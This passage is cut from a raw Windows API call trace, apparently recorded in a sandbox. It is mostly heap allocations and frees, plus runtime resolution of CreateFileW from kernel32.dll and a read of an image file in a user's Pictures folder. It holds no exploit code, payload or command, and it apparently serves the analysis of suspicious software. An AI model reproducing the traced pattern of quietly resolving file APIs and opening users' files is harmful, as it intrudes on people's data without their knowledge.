hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0087.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0087.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0087.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0087.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0087.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0087.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0087.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0087.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0087.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0087.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0087.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0087.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0087.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0087.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0087.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0087.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0087.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0087.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0087.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0087.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0087.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0087.671] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0087.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0087.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0087.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0087.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0087.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0087.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0087.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0087.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0087.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0087.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0087.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0087.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0087.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0087.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.685] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0087.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0087.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0087.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0087.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0087.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0087.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0087.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0087.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0087.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0087.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0087.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0087.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0087.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0087.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.686] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0087.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0087.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0087.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0087.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0087.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0087.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0087.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0087.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.687] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.687] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0087.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.687] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0087.687] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1c0 [0087.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca1c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0087.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.688] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0087.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0087.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0087.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0087.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0087.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0087.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0087.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0087.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0087.688] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0087.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0087.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0087.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0087.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0087.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0087.688] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0087.688] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\eY_MSASCT-tpPguP.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ey_msasct-tppgup.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0087.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0087.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0087.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0087.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0087.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0087.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0087.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0087.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0087.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0087.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0087.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0087.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0087.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0087.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0087.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0087.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0087.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0087.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0087.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0087.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0087.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0087.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0087.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0087.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0087.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0087.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0087.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0087.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0087.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0087.750] FreeLibrary (hLibModule=0x772d0000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0087.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.751] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.751] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0087.752] HeapFree (in: hHeap=0x1780000, 